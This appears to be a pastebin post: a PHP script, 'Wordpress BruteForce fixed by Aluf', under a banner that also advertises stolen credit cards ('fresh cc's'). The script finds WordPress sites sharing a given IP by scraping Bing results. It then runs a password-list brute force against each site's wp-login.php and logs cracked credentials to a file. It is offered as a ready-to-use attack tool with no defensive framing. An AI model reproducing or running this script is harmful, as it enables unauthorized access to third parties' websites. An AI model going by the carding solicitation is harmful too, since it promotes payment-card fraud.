Wordpress BruteForce fixed by Aluf

1. ########################################################################
2. ########################################################################
3. ####                     Posts  © Aluf                              ####
4. ####               http://Aluf.chatango.com                         ####
5. ####                                                                ####
6.   _____  .__          _____                                         ####
7.   /  _  \ |  |  __ ___/ ____\                                       ####
8.  /  /_\  \|  | |  |  \   __\                                        ####
9. /    |    \  |_|  |  /|  |                                          ####
10. \____|__  /____/____/ |__|     © Aluf-[www.pastebing.tk]            ####
11.         \/                                                          ####
12. ####   Message me anytime for any doubts .CC's i post might not     ####
13. ####   be working  everytime,so message me for fresh cc's  .        ####
14. ####   Website :   www.pastebing.tk                                 ####
15. ####   If you need suggestion for the pastebin bots of chatango     ####
16. ####   message me,lol i have run all the bots here myself,so        ####
17. ####   i guess ,i know which is the worst and best   .              ####
18. ####   Do not ask for my bot code on pm ,i quit years back .        ####
19. ####   If you have doubts regarding other codes on my pastebin      ####
20. ####   Still message me on Aluf or tyt or 93. [93 FOR COMPLAINS]    ####
21. ####   I Have been getting a lot of messages lately for cc's        ####
22. ####   and the worst part is many want to know to hack cc           ####
23. ####   I cannot help you with that ,you have to find a way yourself ####
24. ####   but ofc you can always ask for cc's but don't ask me how to  ####
25.  ____  _     _     _____                                            ####
26. /  _ \/ \   / \ /\/    /                                            ####
27. | / \|| |   | | |||  __\                                            ####
28. | |-||| |_/\| \_/|| |                                               ####
29. \_/ \|\____/\____/\_/   ©   PMR [ Add me before messaging ]         ####
30. ########################################################################
31.  
32.  
33. <?
34.         /*
35.          ******************** BY ALUF *************************
36.         */
37.         @set_time_limit(0);
38.         if(count($argv)<3)
39.         {
40.                 print "
41.                               _  _                      
42.            BruteForcer fixed by Aluf\r\n";
43.  
44.                 die();
45.         }
46.         ################
47.        $ip = $argv[1];
48.         $username = $argv[2];
49.         $passlist = $argv[3];
50.         $password = explode("\n", @file_get_contents($passlist));
51.         $bing = "IP:+{$ip}+page_id=";
52.         ################
53.   function check($url)
54.         {
55.                 $url=(!eregi("http://www",$url))?str_replace("http://","http://www.",$url):$url;
56.         preg_match("#(.*?)\/[?]page_id=#",$url,$m);
57.         return $m[1];
58.     }
59.         print("                   SEX   \r\n");
60.         for($i=1;$i<=10+10;$i++)
61.         {
62.                 $get = @file_get_contents("http://www.bing.com/search?q={$bing}&go=&qs=ds&filt=all&first=$i");
63.                 preg_match_all('#(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)#siU',$get, $site);
64.                 $sites = array_unique($site[2]);
65.         }
66.                 $fopen = fopen('xsec-sites.txt','w');
67.                 foreach($sites as $webs)
68.                 {
69.                         $domains = check($webs);
70.                         $do = "{$domains}\r\n";
71.                         $f = fwrite($fopen,$do);
72.                         if($f)
73.                         {
74.                                 print "# {$domains} -> Saved ! #\r\n";
75.                         }
76.                 }
77.         ################## Brute Force ##################
78.  
79.         $xsec_list = "xsec-sites.txt";
80.         $fopen2 = fopen('cracks.txt','a+');
81.         $weblist = explode("\n", @file_get_contents($xsec_list));
82.         foreach($weblist as $web)
83.         {
84.                 $web = @trim($web);
85.                 print "{$web}/ \r\n";
86.                 foreach($password as $pass)
87.                 {
88.                         $pass = @trim($pass);
89.                         $b0x = b0x($web,$username,$pass);
90.                         if(preg_match('/<div id="screen-meta" class="metabox-prefs">/', $b0x))
91.                         {
92.                                 print "Cracked -> {$username} -> {$pass}\r\n";
93.                                 $s1 = "{$web} -> User: {$username} -> Pass: {$pass}\r\n";
94.                                 fwrite($fopen2,$s1);
95.                                 break;
96.                         }
97.                 }
98.         }
99.         function b0x($web,$username,$pass)
100.         {
101.         $curl = curl_init();
102.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
103.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
104.         curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./b0x.txt");
105.         curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./b0x.txt");
106.         curl_setopt($curl,CURLOPT_URL, "{$web}/wp-login.php");
107.                 curl_setopt($curl,CURLOPT_POSTFIELDS, "log={$username}&pwd={$pass}&wp-submit=Log+In&redirect_to=./wp-admin/&testcookie=1");
108.         $brute = curl_exec($curl);
109.                 return $brute;
110.     }
111.         @system("del b0x.txt");
112.         @system("rm b0x.txt");
113.        
114. ?>